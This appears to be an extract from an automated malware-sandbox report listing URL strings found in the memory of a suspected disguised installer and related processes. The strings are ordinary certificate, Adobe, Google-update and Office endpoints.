| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1290949826.000000000136F000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0 |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0 |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1290949826.000000000136F000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C |
| Source: svchost.exe, 0000000E.00000002.3754901379.000001BD9DCBF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver) |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digic |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertA |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1290949826.000000000136F000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0 |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0 |
| Source: Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0 |
| Source: Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0 |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0= |
| Source: svchost.exe, 0000000E.00000002.3757994329.000001BD9F2F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3753812155.000001BD9DC13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/ |
| Source: svchost.exe, 0000000E.00000002.3757420032.000001BD9F265000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/B |
| Source: svchost.exe, 0000000E.00000002.3757804750.000001BD9F2EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.3087516907.000001BD9F0FA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.3186071531.000001BD9F0FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad3skwo2srs5xchyxzz6ujgnedha_9.52.0/gcmjk |
| Source: svchost.exe, 0000000E.00000003.3344719462.000001BD9F0F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adaazxebpgqt5dgoqptvhnyrkajq_20241104.690 |
| Source: svchost.exe, 0000000E.00000003.2102854188.000001BD9F0F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2080588463.000001BD9F0F2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2620129906.000001BD9F0F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/ |
| Source: svchost.exe, 0000000E.00000003.3087516907.000001BD9F0FA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3753812155.000001BD9DC13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2620129906.000001BD9F0F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/nei |
| Source: svchost.exe, 0000000E.00000002.3757420032.000001BD9F265000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/exe |
| Source: svchost.exe, 0000000E.00000002.3754142240.000001BD9DC5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/l |
| Source: svchost.exe, 0000000E.00000002.3757420032.000001BD9F265000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3757577504.000001BD9F2AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com:80/ |
| Source: svchost.exe, 0000000E.00000002.3758352246.000001BD9F330000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/adaazxebpgqt5dgoqptvhnyrkajq_20241104. |
| Source: svchost.exe, 0000000E.00000003.2596741338.000001BD9F2FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8 |
| Source: svchost.exe, 0000000E.00000002.3757577504.000001BD9F2AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com:80IO:ID: |
| Source: svchost.exe, 0000000E.00000003.1328046176.000001BDA3400000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20 |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://ocsp.digicert.com0 |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1290949826.000000000136F000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://ocsp.digicert.com0A |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1290949826.000000000136F000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://ocsp.digicert.com0C |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://ocsp.digicert.com0X |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.dr | String found in binary or memory: http://typekit.com/eulas/000000000000000000014822 |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.dr | String found in binary or memory: http://typekit.com/eulas/000000000000000000014823 |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.dr | String found in binary or memory: http://typekit.com/eulas/000000000000000000014824 |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.dr | String found in binary or memory: http://typekit.com/eulas/000000000000000000014825 |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339572054.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763291568.0000000006250000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339416416.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3764681817.0000000009232000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009A39000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.dr | String found in binary or memory: http://typekit.com/eulas/000000000000000000014f4d |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339572054.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339416416.00000000053E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://typekit.com/eulas/000000000000000000014f4dQ; |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.dr | String found in binary or memory: http://typekit.com/eulas/000000000000000000014f4e |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340892950.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340316690.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339827960.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340065858.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.00000000068F0000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3764681817.0000000009232000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009A39000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.dr | String found in binary or memory: http://typekit.com/eulas/000000000000000000014f4f |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339827960.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340065858.0000000005418000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://typekit.com/eulas/000000000000000000014f4fdflt |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3764681817.0000000009232000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.0000000006CB0000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009A39000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.dr | String found in binary or memory: http://typekit.com/eulas/000000000000000000014f50 |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340892950.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340316690.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.00000000068F0000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3764681817.0000000009232000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009A39000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.dr | String found in binary or memory: http://typekit.com/eulas/000000000000000000014f51 |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1318073315.00000000053CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://typekit.com/eulas/000000000000000000014f51li |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.dr | String found in binary or memory: http://typekit.com/eulas/000000000000000000014f52 |
| Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.dr | String found in binary or memory: http://www.digicert.com/CPS0 |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: http://www.winimage.com/zLibDll |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://cc-api-data-stage.adobe.io/ingest |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.0000000001377000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://cc-api-data.adobe.io/ingest |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.00000000068F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cc-api-data.adobe.io/ingest/?api_key=hdbs |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1529836245.000000000BA1F000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3762015475.0000000005C35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://delegated-or2.cloud.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://delegated-or2.cloud.adobe.ioO.https://delegated-or2.cloud.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://delegated-stage-or2.stage.cloud.adobe. |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3762015475.0000000005C35000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3777002946.000000000D006000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://delegated-stage-or2.stage.cloud.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://delegated-stage-or2.stage.cloud.adobe.ioY |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3762015475.0000000005C35000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3777002946.000000000D006000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://delegated-stage-va6.stage.cloud.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://delegated-stage-va6.stage.cloud.adobe.ioO.https://delegated-stage-va6.stage.cloud.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1529836245.000000000BA1F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://delegated-va6.cloud.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://delegated-va6.cloud.adobe.ioO.https://delegated-va6.cloud.adobe.io |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3762015475.0000000005C35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://delegated-va6.cloud.adobe.iohttps://ims-na1.adobelogin.com/imsd |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763050320.0000000006167000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://delegated.adobelogin.com/( |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.00000000012CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://delegated.adobelogin.comity |
| Source: svchost.exe, 0000000E.00000003.1328046176.000001BDA3459000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C: |
| Source: svchost.exe, 0000000E.00000003.1328046176.000001BDA3400000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C: |
| Source: chromecache_240.18.dr | String found in binary or memory: https://github.com/WebReflection/url-search-params/blob/master/README.md#ios-10--other-platforms-bug |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp | String found in binary or memory: https://ims-na1-stg1.adobelogin.com |
| Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3762015475.0000000005C35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ims-na1-stg1.adobelogin.com/ims |
